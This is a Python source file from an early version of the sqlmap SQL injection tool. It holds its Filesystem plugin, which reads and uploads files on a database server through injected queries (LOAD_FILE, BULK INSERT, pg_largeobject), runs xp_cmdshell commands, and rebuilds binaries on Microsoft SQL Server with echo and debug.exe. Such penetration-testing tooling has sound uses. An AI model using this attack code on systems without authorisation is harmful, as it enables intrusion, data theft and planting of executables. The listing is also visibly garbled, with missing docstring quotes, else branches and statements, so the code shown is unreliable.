#!/usr/bin/env python


This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.

sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more

You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

import binascii
import os

from lib.core.agent import agent
from lib.core.common import dataToOutFile
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.data import kb
from lib.core.data import logger
from lib.request import inject
from lib.techniques.outband.stacked import stackedTest

class Filesystem:
    This class defines generic OS file system functionalities for plugins.

    def __init__(self):
        self.fileTblName = "sqlmapfile"
        self.tblField    = "data"

    def __unbase64String(self, base64Str):
        unbase64Str = "%s\n" % base64Str.decode("base64")

        return unbase64Str

    def __unhexString(self, hexStr):
        if len(hexStr) % 2 != 0:
            errMsg  = "for some reasons sqlmap retrieved an odd-length "
            errMsg += "hexadecimal string which it is not able to convert "
            errMsg += "to raw string"

            return hexStr

        return binascii.unhexlify(hexStr)

    def __binDataToScr(self, binaryData, chunkName):
        Called by Microsoft SQL Server plugin to write a binary file on the
        back-end DBMS underlying file system

        fileLines = []
        fileSize  = len(binaryData)
        lineAddr  = 0x100
        lineLen   = 20

        fileLines.append("n %s" % chunkName)
        fileLines.append("%x" % fileSize)
        fileLines.append("f 0100 %x 00" % fileSize)

        for fileLine in range(0, len(binaryData), lineLen):
            scrString = ""

            for lineChar in binaryData[fileLine:fileLine+lineLen]:
                strLineChar = binascii.hexlify(lineChar)

                if not scrString:
                    scrString  = "e %x %s" % (lineAddr, strLineChar)
                    scrString += " %s" % strLineChar

                lineAddr += len(lineChar)



        return fileLines

    def __checkWrittenFile(self, wFile, dFile, fileType):
        if kb.dbms == "MySQL":
            lengthQuery = "SELECT LENGTH(LOAD_FILE('%s'))" % dFile

        elif kb.dbms == "PostgreSQL":
            lengthQuery = "SELECT LENGTH(data) FROM pg_largeobject WHERE loid=%d" % self.oid

        elif kb.dbms == "Microsoft SQL Server":
            self.createSupportTbl(self.fileTblName, self.tblField, "text")

            # Reference: http://msdn.microsoft.com/en-us/library/ms188365.aspx
            inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.fileTblName, dFile, randomStr(10), randomStr(10)))

            lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)

        wFileSize = os.path.getsize(wFile)

        logger.debug("checking if the %s file has been written" % fileType)
        dFileSize = inject.getValue(lengthQuery, resumeValue=False, charsetType=2)

        if dFileSize and dFileSize.isdigit():
            infoMsg  = "the file has been successfully written and "
            infoMsg += "its size is %s bytes" % dFileSize

            dFileSize = long(dFileSize)

            if wFileSize == dFileSize:
                infoMsg += ", same size as the local file '%s'" % wFile
                infoMsg += ", but the size differs from the local "
                infoMsg += " file '%s' (%d bytes)" % (wFile, wFileSize)

            warnMsg  = "it looks like the file has not been written, this "
            warnMsg += "can occur if the DBMS process' user has no write "
            warnMsg += "privileges in the destination path"

    def fileToSqlQueries(self, fcEncodedList):
        Called by MySQL and PostgreSQL plugins to write a file on the
        back-end DBMS underlying file system

        counter    = 0
        sqlQueries = []

        for fcEncodedLine in fcEncodedList:
            if counter == 0:
                sqlQueries.append("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, fcEncodedLine))
                updatedField = agent.simpleConcatQuery(self.tblField, fcEncodedLine)
                sqlQueries.append("UPDATE %s SET %s=%s" % (self.fileTblName, self.tblField, updatedField))

            counter += 1

        return sqlQueries

    def fileEncode(self, fileName, encoding, single):
        Called by MySQL and PostgreSQL plugins to write a file on the
        back-end DBMS underlying file system

        fcEncodedList = []
        fp            = open(fileName, "rb")
        fcEncodedStr  = fp.read().encode(encoding).replace("\n", "")

        if not single:
            fcLength = len(fcEncodedStr)

            if fcLength > 1024:
                for i in range(0, fcLength, 1024):
                    string = ""

                    if encoding == "hex":
                        string += "0x"

                    string += fcEncodedStr[i:i+1024]

                    if encoding == "base64":
                        string = "'%s'" % string


        if not fcEncodedList:
            if encoding == "hex":
                fcEncodedStr = "0x%s" % fcEncodedStr
            elif encoding == "base64":
                fcEncodedStr = "'%s'" % fcEncodedStr

            fcEncodedList = [ fcEncodedStr ]

        return fcEncodedList

    def updateBinChunk(self, binaryData, tmpPath):
        Called by Microsoft SQL Server plugin to write a binary file on the
        back-end DBMS underlying file system

        randScr        = "sqlmapfile%s.scr" % randomStr(lowercase=True)
        chunkName      = randomStr(lowercase=True)
        fileScrLines   = self.__binDataToScr(binaryData, chunkName)
        forgedScrLines = []
        cmd            = ""
        charCounter    = 0
        maxLen         = 4096

        logger.debug("generating binary file %s\%s, wait.." % (tmpPath, chunkName))

        for scrLine in fileScrLines:
            forgedScrLine  = "echo %s " % scrLine
            forgedScrLine += ">> %s\%s" % (tmpPath, randScr)

        for forgedScrLine in forgedScrLines:
            cmd         += "%s & " % forgedScrLine
            charCounter += len(forgedScrLine)

            if charCounter >= maxLen:
                forgedCmd = self.xpCmdshellForgeCmd(cmd)

                cmd         = ""
                charCounter = 0

        if cmd:
            forgedCmd = self.xpCmdshellForgeCmd(cmd)

        commands = (
                     "cd %s" % tmpPath,
                     "debug < %s" % randScr,
                     "del /F %s" % randScr

        complComm = " & ".join(command for command in commands)
        forgedCmd = self.xpCmdshellForgeCmd(complComm)

        self.execCmd(forgedCmd, silent=True)

        return chunkName

    def askCheckWrittenFile(self, wFile, dFile, fileType):
        message  = "do you want confirmation that the file '%s' " % dFile
        message += "has been successfully written on the back-end DBMS "
        message += "file system? [Y/n] "
        output   = readInput(message, default="Y")

        if not output or output in ("y", "Y"):
            self.__checkWrittenFile(wFile, dFile, fileType)

    def readFile(self, rFile):
        fileContent = None



        if not kb.stackedTest:
            debugMsg  = "going to read the file with UNION query SQL "
            debugMsg += "injection technique"

            fileContent = self.unionReadFile(rFile)
            debugMsg  = "going to read the file with stacked query SQL "
            debugMsg += "injection technique"

            fileContent = self.stackedReadFile(rFile)

        if fileContent in ( None, "" ):

        elif isinstance(fileContent, (list, tuple, set)):
            newFileContent = ""

            for chunk in fileContent:
                if isinstance(chunk, (list, tuple, set)):
                    chunk = chunk[0]

                newFileContent += chunk

            fileContent = newFileContent

        if kb.dbms in ( "MySQL", "Microsoft SQL Server" ):
            fileContent = self.__unhexString(fileContent)

        elif kb.dbms == "PostgreSQL":
            fileContent = self.__unbase64String(fileContent)

        rFilePath = dataToOutFile(fileContent)


        return rFilePath

    def writeFile(self, wFile, dFile, fileType=None, confirm=True):


        if not kb.stackedTest:
            debugMsg  = "going to upload the %s file with " % fileType
            debugMsg += "UNION query SQL injection technique"

            self.unionWriteFile(wFile, dFile, fileType, confirm)
            debugMsg  = "going to upload the %s file with " % fileType
            debugMsg += "stacked query SQL injection technique"

            self.stackedWriteFile(wFile, dFile, fileType, confirm)